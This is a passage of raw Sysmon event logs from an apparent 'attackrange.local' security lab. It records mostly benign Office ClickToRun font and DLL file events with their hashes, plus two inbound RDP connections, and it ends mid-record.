Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\RAGE.TTFMD5=C713FD0DF31CF4E5F8E4F09E92698C6D,SHA256=4E06CFA893F7E1E656709AC2CC240CF17CC82DA9FB8DF1AFBF689940E47C0CFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PRISTINA.TTFMD5=67B76DC0172E6D8FF94B2C3F7F36C92F,SHA256=4BD22F9CFA8255C17EF5734964BDCEA39F0614C1975F9D495576A0110F5BF177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\POORICH.TTFMD5=1646CDE4CB82668C6D24C9F33E67E4EA,SHA256=1A98BBB22C3097E418A263CA80B63AC1264E8CBD03D5F0A7143BC598297A387B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PLAYBILL.TTFMD5=9488A34C8F32F727A43F41E0D016E673,SHA256=673E9F49ACE279C73711DD778037B5D435790BE236C9E5892609794B0BB4377F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PER_____.TTFMD5=9DEE58374345F3DFEB49E1C6CC13CA09,SHA256=F8202C3426B5C54B192969351F15EA35288DE44E811E9514D923898214B94184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PERTILI.TTFMD5=A07574C03D9429038E2611BBA0E9C822,SHA256=5B90D215F586C91CBACEEE9E96D8840431E6B4713909DD47AB70084A067D0B10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PERTIBD.TTFMD5=6044A98D98867449410C8D7CFEBB6375,SHA256=1024C55E896123DAD43B1A15F0C86640556B01E9348EB797E6D7C5A889178D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PERI____.TTFMD5=93DA3318761EA9993B45F2620C4CB985,SHA256=2F52EC437A22912EC82C06AFDDE46C6B1C7593B44025C4627901D353A965B161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PERB____.TTFMD5=AFB95001B7A95A9CD3D5A8486FE0E1E1,SHA256=8EB139CDEFF99C8297C95BF857D94DEF798116D02FDCF72CEFB88D43FE7A33D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PERBI___.TTFMD5=C39EAC1AADDC57C5C2F97B5B3A1422C3,SHA256=F8346184D59314A919926DCFB60DA96421781AB19C2E04C2F76F0F82ACE8CEE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PARCHM.TTFMD5=051B6962AEC44EBF6713B46FDCC8D75D,SHA256=5B4A73788F013C252EB5877A7974E5836EEFFC1189DD7319A219080FCC908F80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PAPYRUS.TTFMD5=FFC718CD15E8CAAC3542AF07605BF386,SHA256=895FDEA742CDCCD53E8CE847A7D2D9C3DDBD7EBDBE0444E88246F0F9E4E2526D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\PALSCRI.TTFMD5=C3D5F019ECEB1A180BEF44A28D137048,SHA256=13093D9642D540CB5EFAD5CAD52AD703E11C0E1F5308BC23FF2CFD7737E7516C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\OUTLOOK.TTFMD5=5A7765D47894BAC732F1ED9BEB1F7818,SHA256=1CC072157711F80296F3D013CEC95093FC1BE4E35A97406C46E76B14A97F41E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ONYX.TTFMD5=119308FFFD98C2DF893660D9AEBD99C4,SHA256=BABA81B90B5102D1E1807AED3A4F38ED8F3D0E45C2B12B27152D8101C4DE21FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\OLDENGL.TTFMD5=527EA5851CA62A9A758A44DC39437EAE,SHA256=1D9D8D06AEC3DE7B9ABBCDAC2381F457D9D606B54F05E9B0E0187BF8565A1104,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\OCRAEXT.TTFMD5=2D814A09D668F730CC91D8D6E390DC08,SHA256=2B058A75FF9336C703E48B618EF759906DC9E37712E27698F74AA3EC0B949346,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\NIRMALAB.TTFMD5=4CBDA5FEDD79E2427AF59DAE638C4EE0,SHA256=5EFAC9DB13A3BBCC9498365455C29B7BD1DE3FD71C796F94D973E5A83397707A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\NIRMALA.TTFMD5=61D4DEFE4C6729A44016353C6B86AC69,SHA256=187391D0656AB581AEB403E4307D43EC5E888511124E6CA6B9E417767B3FCE39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\NIAGSOL.TTFMD5=DEEA7A74EA0E562B89EDCA5D89C75436,SHA256=EE5F2638432EFA7EA6273625AE2FE5DFA3D393AD0B51F8F5FB0F3D3C5AE65F6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\NIAGENG.TTFMD5=E5B38FC8A405B9DE2DA31804F25B66AF,SHA256=ECE195C4B0D53CE4EBAED656341708180ABFEBDDDADF219FB014A31E70410BDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MTEXTRA.TTFMD5=E460DD03A6D32E5E70240BEBA929FB7E,SHA256=4B20E24F9FCAB717B90CE67EC59539B2B866ADF072B1DCAB71AF6EF34EA8CD78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MTCORSVA.TTFMD5=B98F57AC686FC135914A844EC0CE8D49,SHA256=A6F6DACB871BE365AD93FE1AAB09332F768CD2AA35FDFCA8E0053A38F5A2662B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MSYHBD.TTCMD5=754B8CA1A3BC662247A948ADCAA91459,SHA256=4E4C62999230F7B5497105FBAC586EC797B24D1C29C665EBC0B2B2037E838CF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000070716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.739{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-45418-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000070715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.739{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48149-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MSYH.TTCMD5=5E42BCB1A2F001DEBC82305025461BC5,SHA256=34CB01A122F82B5AD76EE916DBB34AC35EDB2916B857AC6ED4C8593A759AD5AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.392{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE3447022ACBA3E441DE0C6B4C409B52,SHA256=DD64C907740804A9BAC8241C78CAD57082BC5DA7087884B28A12FCD8F7CF241A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MSUIGHUR.TTFMD5=0723999DDC6B4B922EC011B475F07D9D,SHA256=1DA9B5ACE583A0A52E85280264D84917630FF6D600CAEA9A1B99CBD7E8B7C07F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MSUIGHUB.TTFMD5=88DD96D6C1979C106E70C4347E4E9657,SHA256=8AB5DE475B91361575858E67CE5A55F22A60FC9DC54D4025DFE3504D805CBD22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MSJHBD.TTCMD5=5D1A0D45E04EBE0EF8C7A44E1CA46B56,SHA256=CE47D64B9BB5A6452B0A5F8BAB2DABE20EB97D213D19695AC31EE05B2802AECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MSJH.TTCMD5=3132D56329D73980D5FD547EA7271A98,SHA256=D5F8CC33A9046A8D4832B6240DE683FF217F374E83CE573831808BE477DE321C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.079{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94CFBD050AA69F5EC26CCE24AC8D1421,SHA256=6C7AD14D1EB1301C25A7DA427B97BA21C2EA35D23A8FE6994C7FFAA1F82B422C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049797Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:40.069{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6D7529E34FEF833E1B73FA66DA345E7,SHA256=FA661E3C466522664019887C2FF89508BD40749084E889EAB213DB170BB904B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Tabular.dllMD5=489429393C001C2D7814BE014E9887FD,SHA256=4C8120D6D7C293D03FC4A21681D10DF165258383575E39A71714ECDE60037653,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.SPClient.Interfaces.dllMD5=803F21956486BE41452E4E970B340084,SHA256=8FCC630551F118CCC852BFAF3F80E4D7F5C1EC2B8ADC89DF979848DBAA33FA39,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Amo.dllMD5=547E8C44534278193B2578C64FF8A3EA,SHA256=4EC3E7671AABF5E55FED45BB7394D19877BBE6EBC26EBE05DA2C8D5F51D78ABA,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Amo.Core.dllMD5=1F603E19D21401FA43F2D56F02C4ABD2,SHA256=BDA329C589C11D0B70558BFE6EDDA6C9D340CECA58B26EBC9BBBD1E930308C6F,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.AdomdClient.dllMD5=2043C71616298069C5B77A9A6341D0FE,SHA256=199CEBB77A875A1541973588CA9FFF2F11243B0C7BF791921FE0245EB5C36ACD,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Odata.dllMD5=69954936A09580F8E35CE98056D53B46,SHA256=B62E5552D5FD561B8C7A0B3058AF13714D93E7CC37A50EB901F65D9DA89EE666,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Edm.dllMD5=F9499BE14D8C05200599CE3BD05E06AD,SHA256=E6B10DDA443EE164B37BECC1EE21B3877C1A01C5399843BBC9D09BCDCDE9BEBB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.DataFeedClient.dllMD5=FD4AF7C9F6756F21486D6B43A140B8A6,SHA256=A9F93372506DC0F1BF26835CDB92DC1BF1D65C660D0F7F15CBB146D7EAA6DDAA,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.ConnectionUI.dllMD5=A1E4D4344104CA4D3484010A84B50E7B,SHA256=0DDD718A638790941969B634724D74ED8763C336BA7720377586A2E24B4E36E2,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.ConnectionUI.Dialog.dllMD5=9834A594316521380027C0F0D5F93E94,SHA256=9B0CAB434A6DD3B7BCA2D7E027F51987F9CE0B7A54D85CF44E37F6E7C6E06A2F,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.AnalysisServices.Excel.BackEnd.dllMD5=2B5EDF4599F9C704F64732CC488B724B,SHA256=B8162CA197DDFB05EDC09F07C782661A5EB5731C37AEDF886CE11848E6C1C249,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 